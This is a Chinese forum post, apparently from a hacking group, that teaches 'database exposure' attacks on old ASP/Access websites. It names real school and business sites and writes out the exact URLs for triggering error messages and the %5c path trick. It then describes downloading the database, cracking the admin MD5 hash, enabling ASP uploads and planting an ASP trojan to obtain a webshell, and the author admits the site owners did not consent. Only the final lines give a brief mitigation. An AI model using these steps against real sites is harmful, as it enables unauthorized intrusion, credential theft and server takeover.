手动暴库

51425182

不好意思,抢个座位了`

黑夜幽靈

本文主要是以实际操作、演练为主!
以供和我一样的菜鸟们学习。
本教程所涉及的有漏洞的网站都是实际检测到的!
而且也未征的网站管理员同意.
同时希望大家不要利用本教程做有损这些网站的事情!
后果自负!。

首先大家请打开IE浏览器
然后点上面的 “工具菜单” 再选择 \"IETERNET 选项\"选择 \"高级\"
把里面的那个 \"http错误友好提示\" 前的勾给去了（这一步很重要!）
然后在地址栏里输入 http://www.qd65.qdedu.net/teacher/maths/index2.asp
在主页上随便选择一个新闻。点击进去~~~这里我们选择 数学组教研信息 http://www.qd65.qdedu.net/teache ... e.asp?ArticleID=163
然后我们在地址后面加个小小的斜杠 \"/ \"
也就是在地址栏里
输入 http://www.qd65.qdedu.net/teache ... .asp?ArticleID=163/
然后 你就会看到这样的提示：
类型不匹配: 'Clng'
/teacher/maths/Inc/syscode.asp
然后我们复制后面的 teacher/maths/Inc/syscode.asp加到http://www.qd65.qdedu.net后面`~~
也就是在地址栏里输入 http://www.qd65.qdedu.net/teacher/maths/Inc/syscode.asp
然后大家就会看到这样的提示
'D:\\web\\teacher\\maths\\Inc\\database\\maths.asp'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器
看到没有~~~~数据库真实地址暴露出来了`~~~
http://www.qd65.qdedu.net\\teacher\\maths\\database\\maths.asp
就是数据库地址~~~不过数据库的后缀是MDB 这里改为ASP了`~~~在一段时间里~~~这个方法很流行`~~据说可以防止数据库被下载~~~
但是我们把上面的地址复制到迅雷里~~~就可以下载了
下载后~~~我们把文件后缀改为mdb就可以了`~~
然后打开 （当然，前提是你的机器上装了微软办公软件officee中的accsee 数据库软件。如果没有可以去下载个辅臣数据库浏览器,或者直接安装ACCSEE数据库软件）
然后找到一个叫admin 的表`~~~打开~~~前面的那个 是后台管理员的用户名，后面的那个是经过MD5加密后的密码~~~
然后去网上下个MD5 解密器~~~~就可以破解了`~~这样你就是 管理员了； ~~~（有关MD5的知识，军团内有介绍!）
然后去后台 更改文件上传类型~~~~~加一个ASP
然后就上传 ASP木马`~~~手气好的话 就可以拿到 WEBSHELL 了~~~~
好了`~~~就到这里吧~~~~

今天还是以飞扬学院的新闻系统为例，说说这个曾经非常流行的%5C暴库入侵方法。
首先我们打开
飞扬就业网 http://www.feiyangcollege.com/jyw/index.asp
随便点开一个新闻 关于召开毕业典礼的通知
http://www.feiyangcollege.com/jy ... nt.asp?fID_ArticleC
然后在后面加一个 ' 于是地址是 http://www.feiyangcollege.com/jy ... nt.asp?fID_ArticleC'
提示说我提交非法参数~~~看样子 ' 被程序员屏蔽了 。看样子这样的办法行不通~~~

于是用一下%5c方法~~~
把最后那个/ 改为%5C。也就是http://www.feiyangcollege.com/jyw\\index_Article_Content.asp?fID_ArticleC
看看返回的提示是什么~~

Microsoft JET Database Engine 错误 '80004005'
找不到文件 'E:\\www.feiyangcollege.com\\database.mdb'。
/jyw\\index_Article_Content.asp，行15
哈哈 ，数据库暴露了~~~~
于是输入地址 http://www.feiyangcollege.com/database.mdb
晕~~~竟然不存在 此数据库~~~
于是想了下.....................
哦~~~~~~~原来是这样`~~~（原因等下解释）
于是把地址改为http://www.feiyangcollege.com/jyw/database.mdb
哈哈。。。终于搞定~~~~
心想 怎么飞扬学院的人做程序连这点 都考虑不到啊 `~~~把数据库打开，一看表名以及结构`~~
晕~~~竟然 还是那个深度空间 www.deepteach.com 的程序~~~
想不到~~这么有名的程序 也存在这样的漏洞`~~~哈哈`~~~于是去试一下www.deepteach.com 这个网站 ，看看 结果如何。
晕~~~不行~~纳闷中.....................
于是在论坛上http://www.deepteach.com/Forum/d ... p;ID=290&page=1

再找一个运用了此系统的网站 黑龙江家电维修网http://www.hljjdwx.com/
还是 不行`~~~思考中.............
哦~~~原来 这招只能对付 系统在二级目录下 的程序~~~~
%5c的暴库需要的是二级目录，一级目录无法成功。如：
http://www.feiyang.com%5c1.asp?id=1 不成功
http://www.feiyang.com/other%5c1.asp?id=1 成功

好了，上面所说的只是给大家一个练习的机会~~~~
下面就转几个我收集的这方面的文章，里面有方法和原理。很全面的。（本想自己写的，但是太多了。并且已经有前辈写了，就在这里借用一下）
《再谈%5c暴库的利用》
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
关于%5c的暴库利用想已经不是什么新技术了，原因我只找到含糊的说法：\\的UNICODE是%5c当提交时,IIS无法正常解析,导致暴库。但我对http://www.hoky.org测试成功后（现在已经补上）问过hoky.pro，得知%5c与IIS的设置是有关系的。而在默认设置下是可以暴库的。
还有很多人说不成功，我要说的三点：
1。一般的错误返回页面是本地IE提供的,所以我们先得关了本地的错误页面,具体在菜单项的‘工具->internet选项->高级->显示友好信息'。
2。对方数据库要是Access型。
3。%5c的暴库需要的是二级目录，一级目录无法成功。如：
http://www.sometips.com%5c1.asp?id=1 不成功
http://www.sometips.com/other%5c1.asp?id=1 成功
好了，上面说的大家都知道，当是废话。在暴库这么好用的东西下，如果一个网站只有一级目录的话，难道就没有办法了吗？
说到重点：
其实一级目录我们也同样可以成功的，我们可以通过构造一个多级目录来达到暴库的目的。
如下：
http://www.target.com/noexists/..%5clist.asp?id=1
这样大家就会有新的惊喜了，呵呵。
补救方法也很简单：
在conn.asp里 加入数据库文件的位置后面加上这句：
On Error Resume Next
就可以了。